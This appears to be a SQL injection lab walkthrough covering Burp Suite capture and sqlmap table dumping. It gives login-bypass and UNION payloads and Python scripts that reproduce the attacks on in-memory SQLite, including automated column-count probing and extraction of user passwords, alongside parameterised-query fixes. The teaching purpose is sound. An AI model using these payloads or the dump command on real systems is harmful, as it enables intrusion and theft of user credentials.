A SQL injection attack supplies input that the application concatenates into a SQL query, so that the input changes the meaning of the query instead of being treated as data. You can inspect the page or capture the request with Burp Suite to see which inputs are taken in and how they react to different SQL injection payloads. Try to work out the syntax of the underlying SQL command.
Here we assume the SQL is SELECT * FROM Users WHERE email='inputvalue'. We try the word test, then test' OR 1=1;--. The left side of the example shows how the SQL command changes: the quote closes the string, OR 1=1 makes the condition true for every row, and the -- comments out anything after it that we don't know, such as the password check. (In MySQL the -- must be followed by a space; # also starts a comment.)
sqlmap is a tool that automates SQL injection. More options are covered in the first link under further reading. The example below shows a request captured with Burp Suite and saved to a file named bricks (any name will do).
On the terminal the tables are then dumped with sqlmap -r bricks -p username --dump, where -r reads the saved request, -p restricts testing to the username parameter and --dump dumps the contents of the tables it finds.
After a while it dumps the tables it found.
A request is first captured in Burp Suite using the Intercept tool under Proxy.
It is then sent to Repeater for further tries. Initially we had ss as both the user name and password. We now try to make the query become SELECT * FROM users WHERE name='' OR '1'='1' AND password='' OR '1'='1', so we replace each ss with ' OR '1'='1 and send the request; OR '1'='1' is always true, so the WHERE clause matches every user. If this takes too long, the Intruder tool can automate submitting a list of SQL injection payloads. Check the second further reading.
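As an added example, not code from the original page, the two queries above are rebuilt in Python against an in-memory SQLite table. The table contents, the column names and the exact shape of the login query (name and password both concatenated in) are assumptions. The example prints the query text each payload produces, returns the rows it matches, and runs the same login with bound parameters for contrast.

```python
import sqlite3

# Constructed sample table (not from the page).
USERS = [
    (1, "alice", "alice@example.test", "wonderland"),
    (2, "bob", "bob@example.test", "hunter2"),
    (3, "admin", "admin@example.test", "s3cret"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, name TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?,?,?,?)", USERS)
    return conn


def email_query(email):
    # Query shape the page assumes: SELECT * FROM Users WHERE email='input'
    return "SELECT * FROM Users WHERE email='" + email + "'"


def login_query(name, password):
    # Assumed shape of the login query behind the ss/ss request.
    return ("SELECT * FROM Users WHERE name='" + name
            + "' AND password='" + password + "'")


def run(conn, sql):
    """Execute a built query; return (rows, None) or (None, error text)."""
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as e:
        return None, str(e)


def lookup_by_email(conn, email):
    """Vulnerable lookup: the input is pasted straight into the SQL."""
    return run(conn, email_query(email))


def login(conn, name, password):
    """Vulnerable login: both fields are pasted straight into the SQL."""
    return run(conn, login_query(name, password))


def safe_login(conn, name, password):
    # Bound parameters: the quote in the payload is bound as data, so the
    # structure of the query cannot change.
    return conn.execute("SELECT * FROM Users WHERE name=? AND password=?",
                        (name, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    for email in ("test", "test' OR 1=1;--"):
        rows, err = lookup_by_email(conn, email)
        print(email_query(email))
        print("   ->", err or "%d row(s)" % len(rows))
    payload = "' OR '1'='1"
    print(login_query(payload, payload))
    print("   ->", "%d row(s)" % len(login(conn, payload, payload)[0]))
    print("parameterised:", safe_login(conn, payload, payload))
```

Run it with python3 and compare the printed queries with the ones above: test matches nothing, while test' OR 1=1;-- and the paired ' OR '1'='1 each return every user. The parameterised login returns nothing for the same payload because the driver never lets the quote become SQL syntax.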
Here we try a search bar to see if the request accepts SQL injection.
We capture the request.
Then we send it to Repeater and send the request, trying test on the search parameter q:
With an empty request we see raw JSON (the beautifier tab shows the JSON more readably). If nothing is inserted at q, everything is returned.
When we search for ; to try to close the SQL statement we get an error, but the error response can help us inject more precisely. Below, the error gives away that we have not closed the brackets around the SQL name search. It also shows deletedAt IS NULL in the query, which we may use later to find deleted items. Hence we now search for ')), where the quote closes the string and the two brackets close the grouping.
Then we get a successful response.
Now we test a UNION: ')) UNION SELECT '1','2','3','4','5','6','7','8' FROM Users--. We enter this in the Params tab so that Burp URL-encodes it (the quote becomes %27, a space %20, and so on). The UNION must select exactly as many columns as the original query returns; if the count is wrong the response is an error, so add or remove a literal until it succeeds. The trailing -- comments out the rest of the original query.
Then we send it to view the users, which appear in the response alongside the products.
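As an added example, not from the original page, the search endpoint is modelled in Python with SQLite. The product and user rows, the five-column Products table and the query shape are assumptions inferred from the error clues above (the term inside '%...%' LIKE patterns, two brackets to close, a deletedAt IS NULL filter); the terminator probe is sent as '; so that the quote leaves the string before the semicolon ends the statement. Under that assumed shape ')) on its own still leaves a bracket unbalanced, so the example appends -- exactly as the UNION payload does. It goes beyond the page by brute-forcing the UNION column count instead of guessing eight literals, and shows the same search with bound parameters.

```python
import sqlite3

# Constructed sample data (not from the page): a product catalogue with one
# soft-deleted row, plus the Users table the UNION pulls into the results.
PRODUCTS = [
    (1, "Apple Juice", "Pressed apples", 1.99, None),
    (2, "Banana Juice", "Yellow and sweet", 1.49, None),
    (3, "Retired Juice", "No longer sold", 0.99, "2020-01-01"),
]
USERS = [
    (1, "admin@example.test", "s3cret"),
    (2, "bob@example.test", "hunter2"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (id INTEGER, name TEXT, description TEXT,"
                 " price REAL, deletedAt TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?,?,?,?,?)", PRODUCTS)
    conn.execute("CREATE TABLE Users (id INTEGER, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?,?,?)", USERS)
    return conn


def build_search_query(q):
    # Assumed shape of the back-end query, inferred from the page's clues:
    # q sits inside '%...%' LIKE patterns, two brackets have to be closed,
    # and soft-deleted rows are hidden with deletedAt IS NULL.
    return ("SELECT * FROM Products WHERE ((name LIKE '%" + q + "%' "
            "OR description LIKE '%" + q + "%') AND deletedAt IS NULL)")


def search(conn, q):
    """Vulnerable search. Returns (rows, None) or (None, error text)."""
    try:
        return conn.execute(build_search_query(q)).fetchall(), None
    except sqlite3.Error as e:
        return None, str(e)


def safe_search(conn, q):
    """Same search with bound parameters: the payload is only ever data."""
    pattern = "%" + q + "%"
    return conn.execute(
        "SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?)"
        " AND deletedAt IS NULL)", (pattern, pattern)).fetchall()


def find_union_column_count(conn, max_cols=12):
    """Grow the UNION SELECT one literal at a time until the database stops
    rejecting it for a column-count mismatch; return that count."""
    for n in range(1, max_cols + 1):
        literals = ", ".join("'%d'" % i for i in range(1, n + 1))
        rows, err = search(conn, "')) UNION SELECT " + literals + "--")
        if err is None:
            return n
    return None


def dump_users_via_union(conn):
    """Use the discovered column count to pull Users rows into the results."""
    n = find_union_column_count(conn)
    if n is None or n < 3:
        raise RuntimeError("could not find a usable column count")
    cols = ["id", "email", "password"] + ["'%d'" % i for i in range(4, n + 1)]
    rows, err = search(conn, "')) UNION SELECT " + ", ".join(cols) + " FROM Users--")
    if err is not None:
        raise RuntimeError(err)
    return rows


if __name__ == "__main__":
    conn = make_db()
    for q in ("", "';", "'))", "'))--"):
        rows, err = search(conn, q)
        print(repr(q), "->", err if err else "%d rows" % len(rows))
    print("UNION columns:", find_union_column_count(conn))
    for row in dump_users_via_union(conn):
        print(row)
```

The empty search returns the two live products, '; and a bare ')) both raise syntax errors, and '))-- returns all three rows including the soft-deleted one because the deletedAt filter has been commented out. The column probe settles on five, after which the Users rows come back mixed in with the products; the parameterised search returns nothing for any of these payloads.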
Things to consider: